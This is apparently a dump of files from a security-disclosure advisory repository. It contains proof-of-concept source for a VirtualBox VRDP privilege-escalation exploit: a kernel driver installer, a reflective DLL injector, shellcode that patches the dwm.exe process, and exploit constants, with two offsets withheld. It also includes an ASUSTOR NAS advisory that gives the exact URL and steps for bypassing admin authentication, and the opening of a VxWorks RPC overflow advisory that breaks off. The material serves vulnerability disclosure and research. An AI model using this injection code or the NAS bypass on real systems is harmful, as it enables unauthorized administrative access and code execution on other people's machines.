#define VBOX_VERSION_MINOR 2 6 | #define VBOX_VERSION_BUILD 6 7 | #define VBOX_VERSION_STRING_RAW "5.2.6" 8 | #define VBOX_VERSION_STRING "5.2.6_OSE" 9 | #define VBOX_API_VERSION_STRING "5_2" 10 | 11 | #define VBOX_PRIVATE_BUILD_DESC "Private build by admin" 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.inf: -------------------------------------------------------------------------------- 1 | ; 2 | ; vrdpexploit.inf 3 | ; 4 | 5 | [Version] 6 | Signature="$WINDOWS NT$" 7 | Class=Sample ; TODO: edit Class 8 | ClassGuid={78A1C341-4539-11d3-B88D-00C04FAD5171} ; TODO: edit ClassGuid 9 | Provider=%ManufacturerName% 10 | CatalogFile=vrdpexploit.cat 11 | DriverVer= ; TODO: set DriverVer in stampinf property pages 12 | 13 | [DestinationDirs] 14 | DefaultDestDir = 12 15 | vrdpexploit_Device_CoInstaller_CopyFiles = 11 16 | 17 | ; ================= Class section ===================== 18 | 19 | [ClassInstall32] 20 | Addreg=SampleClassReg 21 | 22 | [SampleClassReg] 23 | HKR,,,0,%ClassName% 24 | HKR,,Icon,,-5 25 | 26 | [SourceDisksNames] 27 | 1 = %DiskName%,,,"" 28 | 29 | [SourceDisksFiles] 30 | vrdpexploit.sys = 1,, 31 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames 32 | 33 | ;***************************************** 34 | ; Install Section 35 | ;***************************************** 36 | 37 | [Manufacturer] 38 | %ManufacturerName%=Standard,NT$ARCH$ 39 | 40 | [Standard.NT$ARCH$] 41 | %vrdpexploit.DeviceDesc%=vrdpexploit_Device, Root\vrdpexploit ; TODO: edit hw-id 42 | 43 | [vrdpexploit_Device.NT] 44 | CopyFiles=Drivers_Dir 45 | 46 | [Drivers_Dir] 47 | vrdpexploit.sys 48 | 49 | ;-------------- Service installation 50 | [vrdpexploit_Device.NT.Services] 51 | AddService = vrdpexploit,%SPSVCINST_ASSOCSERVICE%, vrdpexploit_Service_Inst 52 | 53 | ; -------------- vrdpexploit driver install sections 54 | 
[vrdpexploit_Service_Inst] 55 | DisplayName = %vrdpexploit.SVCDESC% 56 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER 57 | StartType = 3 ; SERVICE_DEMAND_START 58 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL 59 | ServiceBinary = %12%\vrdpexploit.sys 60 | 61 | ; 62 | ;--- vrdpexploit_Device Coinstaller installation ------ 63 | ; 64 | 65 | [vrdpexploit_Device.NT.CoInstallers] 66 | AddReg=vrdpexploit_Device_CoInstaller_AddReg 67 | CopyFiles=vrdpexploit_Device_CoInstaller_CopyFiles 68 | 69 | [vrdpexploit_Device_CoInstaller_AddReg] 70 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller" 71 | 72 | [vrdpexploit_Device_CoInstaller_CopyFiles] 73 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll 74 | 75 | [vrdpexploit_Device.NT.Wdf] 76 | KmdfService = vrdpexploit, vrdpexploit_wdfsect 77 | [vrdpexploit_wdfsect] 78 | KmdfLibraryVersion = $KMDFVERSION$ 79 | 80 | [Strings] 81 | SPSVCINST_ASSOCSERVICE= 0x00000002 82 | ManufacturerName="" ;TODO: Replace with your manufacturer name 83 | ClassName="Samples" ; TODO: edit ClassName 84 | DiskName = "vrdpexploit Installation Disk" 85 | vrdpexploit.DeviceDesc = "vrdpexploit Device" 86 | vrdpexploit.SVCDESC = "vrdpexploit Service" 87 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDll.c: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // This is a stub for the actuall functionality of the DLL. 
3 | //===============================================================================================// 4 | #include "ReflectiveLoader.h" 5 | 6 | // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are 7 | // defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own 8 | // DllMain and use the LoadRemoteLibraryR() API to inject this DLL. 9 | 10 | // You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) 11 | extern HINSTANCE hAppInstance; 12 | extern VOID HijackHostId(PVOID launcherProcessMemory); 13 | //===============================================================================================// 14 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) 15 | { 16 | BOOL bReturnValue = TRUE; 17 | switch (dwReason) 18 | { 19 | case DLL_QUERY_HMODULE: 20 | if (lpReserved != NULL) 21 | *(HMODULE *)lpReserved = hAppInstance; 22 | break; 23 | case DLL_PROCESS_ATTACH: 24 | hAppInstance = hinstDLL; 25 | //MessageBoxA(NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK); 26 | HijackHostId(lpReserved); 27 | break; 28 | case DLL_PROCESS_DETACH: 29 | case DLL_THREAD_ATTACH: 30 | case DLL_THREAD_DETACH: 31 | break; 32 | } 33 | return bReturnValue; 34 | } -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDllInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 
4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID); 45 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/Shellcode.asm: -------------------------------------------------------------------------------- 1 | PUBLIC Shellcode 2 | 3 | EXTERN gHostId: DWORD 4 | EXTERN RestoreBytes: PROC 5 | 6 | .CODE 7 | 8 | Shellcode PROC 9 | 10 | ; We should preserve all the registers because it's not known 11 | ; what of them will be used in RestoreBytes() 12 | push rax 13 | push rbx 14 | push rcx 15 | push rdx 16 | push rsi 17 | push rdi 18 | push r8 19 | push r9 20 | push r10 21 | push r11 22 | push r12 23 | push r13 24 | push r14 25 | push r15 26 | 27 | ; IDirect3DSurface9* pSrcSurfIf = [rsp + 0260h] 28 | ; We add 8 to because the shellcode is call'ed by the patch 29 | ; We also add 112 to account all the push'es (8 * 14) 30 | mov rax, qword 
ptr [rsp + 0260h + 08h + 070h]; 31 | 32 | ; wined3d_surface* surface = ((d3d9_surface*)pSrcSurfIf)->wined3d_surface 33 | mov rax, qword ptr [rax + 010h] 34 | 35 | ; uint32_t hostId = surface->texture_name 36 | mov eax, dword ptr [rax + 0F4h] 37 | 38 | ; Save Host ID 39 | mov dword ptr [gHostId], eax 40 | 41 | ; Replace the patch with original bytes so the shellcode will not be called anymore 42 | call RestoreBytes 43 | 44 | pop r15 45 | pop r14 46 | pop r13 47 | pop r12 48 | pop r11 49 | pop r10 50 | pop r9 51 | pop r8 52 | pop rdi 53 | pop rsi 54 | pop rdx 55 | pop rcx 56 | pop rbx 57 | pop rax 58 | 59 | ret 60 | 61 | Shellcode ENDP 62 | 63 | END -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | 43 | 44 | Source Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher.sln: 
-------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27428.2005 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit_launcher", "vrdpexploit_launcher\vrdpexploit_launcher.vcxproj", "{BE8BC74D-5981-4C66-8332-0C79ACE67A15}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hostid_hijacker", "hostid_hijacker\hostid_hijacker.vcxproj", "{0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.ActiveCfg = Debug|x64 19 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.Build.0 = Debug|x64 20 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.ActiveCfg = Debug|Win32 21 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.Build.0 = Debug|Win32 22 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.ActiveCfg = Release|x64 23 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.Build.0 = Release|x64 24 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.ActiveCfg = Release|Win32 25 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.Build.0 = Release|Win32 26 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.ActiveCfg = Debug|x64 27 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.Build.0 = Debug|x64 28 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.ActiveCfg = Debug|Win32 29 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.Build.0 = Debug|Win32 30 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.ActiveCfg = Release|x64 31 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.Build.0 = Release|x64 32 | 
{0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.ActiveCfg = Release|Win32 33 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {6212740A-BF6E-48E0-9BD4-FC50CE875A0E} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/GetProcAddressR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName); 34 | //===============================================================================================// 35 | #endif 36 | //===============================================================================================// 37 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/LoadLibraryR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 
4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | DWORD GetReflectiveLoaderOffset(VOID * lpReflectiveDllBuffer); 34 | 35 | HMODULE WINAPI LoadLibraryR(LPVOID lpBuffer, DWORD dwLength); 36 | 37 | HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter); 38 | 39 | //===============================================================================================// 40 | #endif 41 | //===============================================================================================// 42 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Process.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | DWORD 6 | GetPidByName(PCHAR name) { 7 | PROCESSENTRY32 entry; 8 | entry.dwSize = sizeof(PROCESSENTRY32); 9 | 10 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 11 | if (Process32First(snapshot, &entry)) { 12 | do { 13 | if (!_stricmp(entry.szExeFile, name)) { 14 | DWORD pid = entry.th32ProcessID; 15 | printf("[*] PID: %d\n", pid); 16 | return pid; 17 | } 18 | } while (Process32Next(snapshot, 
&entry)); 19 | } 20 | 21 | printf("[-] Failed to get PID of %s\n", name); 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_METASPLOIT_ATTACH 4 37 | #define DLL_METASPLOIT_DETACH 5 38 | #define DLL_QUERY_HMODULE 6 39 | 40 | #define DEREF( name )*(UINT_PTR *)(name) 41 | #define DEREF_64( name )*(DWORD64 *)(name) 42 | #define DEREF_32( name )*(DWORD *)(name) 43 | #define DEREF_16( name )*(WORD *)(name) 44 | #define DEREF_8( name )*(BYTE *)(name) 45 | 46 | typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID); 47 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); 48 | 49 | #define DLLEXPORT __declspec( dllexport ) 50 | 51 | //===============================================================================================// 52 | #endif 53 | //===============================================================================================// 54 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/_Constants.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | 3 | /****************************************************************************** 4 | * Exploit's contants - if something not works, consider to review them 5 | ******************************************************************************/ 6 | 7 | /********** Launcher constants **********/ 8 | 9 | CHAR gDriverName[] = "vrdpexploit.sys"; 10 | CHAR gDeviceName[] = "\\??\\vrdpexploit"; 11 | DWORD gIoctlEscalate = CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002000 */ 12 | DWORD gIoctlExploit = CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002004 */ 13 | 14 | CHAR gDwmName[] = "dwm.exe"; 15 | CHAR gHijackerName[] = "hostid_hijacker.dll"; 16 | CHAR gSuspendCommand[] = "pssuspend64.exe -nobanner dwm.exe"; 17 | CHAR gResumeCommand[] = "pssuspend64.exe -nobanner -r dwm.exe"; 18 | 19 | /********** Host ID Hijacker constants **********/ 20 | 21 | CHAR launcherProcessName[] = "vrdpexploit_launcher.exe"; 22 | 23 | BYTE gPatch[] = 24 | "\xE8\x00\x00\x00\x00" // call $5 25 | "\x58" // pop rax 26 | "\x48\x83\xE8\x05" // sub rax, 5 27 | "\x50" // push rax 28 | "\x48\xB8\x41\x41\x41\x41\x41\x41\x41\x41" // mov rax, 0x4141414141414141 29 | "\x50" // push rax 30 | "\xC3"; // ret 31 | 32 | // Workaround to define a "constant" instead of #define PATCH_SIZE 33 | // in several files. 34 | enum patch_size { 35 | patchSize = 23, 36 | }; 37 | enum patch_size gPatchSize = patchSize; 38 | 39 | // Offset from gPatch to a shellcode address of command "mov rax, ..." 
40 | ULONGLONG gPatchShellcodeAddrOffset = ???; // Removed for the sake of PoC 41 | 42 | // Offset inside vboxWddmDDevPresent where gPatch will be copied 43 | ULONGLONG gPatchOffset = ???; // Removed for the sake of PoC 44 | 45 | BYTE gSavedBytes[patchSize]; 46 | 47 | const DWORD gLastValidHostId = 100; 48 | 49 | /****************************************************************************** 50 | * End of exploit's contants 51 | ******************************************************************************/ 52 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | Source Files 43 | 44 | 45 | Source Files 46 | 47 | 48 | Source Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 3747/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | An ASUSTOR NAS or network attached storage is “a computer appliance built from the ground up for storing and serving files. It attaches directly to a network, allowing those on the network to access and share files from a central location”. In the following advisory we will discuss a vulnerability found inside ASUSTOR NAS which lets anonymous attackers bypass the product’s authentication requirement. 3 | 4 | **Credit**
5 | An independent security researcher, Ahmed Y. Elmogy, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 6 | 7 | **Affected systems**
8 | ASUSTOR NAS devices running ADM version 3.0.5.RDU1 and prior 9 | 10 | **Vulnerability Details**
11 | The vulnerability lies in the web interface of ASUSTOR NAS, in the file located at /initial/index.cgi, which is responsible for initializing the device with your ASUSTOR ID. The problem is that this file remains available after the first initialization, and it doesn’t require any authentication at all. 12 | So by abusing /initial/index.cgi?act=register, you’ll be logged in with administrator privileges without any kind of authentication. On a device that has already been initialized, requests to this endpoint are unexpected, so they are a useful signal in web access logs, and the management interface should be kept off untrusted networks. 13 | 14 | **How to Exploit**
15 | Visit:
16 | `http://:/initial/index.cgi?act=register`
17 | (Port will probably be 8800)
18 | Check “Register later”, click on next, and press the “Start” button. You’ll be redirected to /portal/index.cgi with a sid parameter, bypassing the authentication, and accessing the web interface with admin privileges. 19 | -------------------------------------------------------------------------------- /SSD Advisory - 3904/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | The following advisory describes a vulnerability found in the Remote Procedure Call (RPC) component of the VxWorks real-time Operating System. The component suffers from a buffer overflow, which can be exploited to make it execute arbitrary code. 3 | 4 | **CVE**
5 | CVE-2019-9865 6 | 7 | **Credit**
8 | An independent Security Researcher, Yu Zhou, has reported this vulnerability to SSD Secure Disclosure program. 9 | 10 | **Affected systems**
11 | VxWorks OS version 6.6 12 | 13 | **Vendor Response**
14 | “We’ve gone through our supported versions of VxWorks and found the versions affected are 6.9 before 6.9.1. We released the update to our customers today. Except in special circumstances, we only release statements and fixes for supported products. We know you found this vulnerability in an unsupported version of VxWorks. We won’t have a code update for that, but a mitigation is to disable CONFIG_RPC. This will be published in NVD as CVE-2019-9865. It should be public shortly. Thank you for working with us to resolve this problem. We hope to work with you in the future if you have found other vulnerabilities, and we may have other questions for you.” 15 | 16 | **Vulnerability Details**
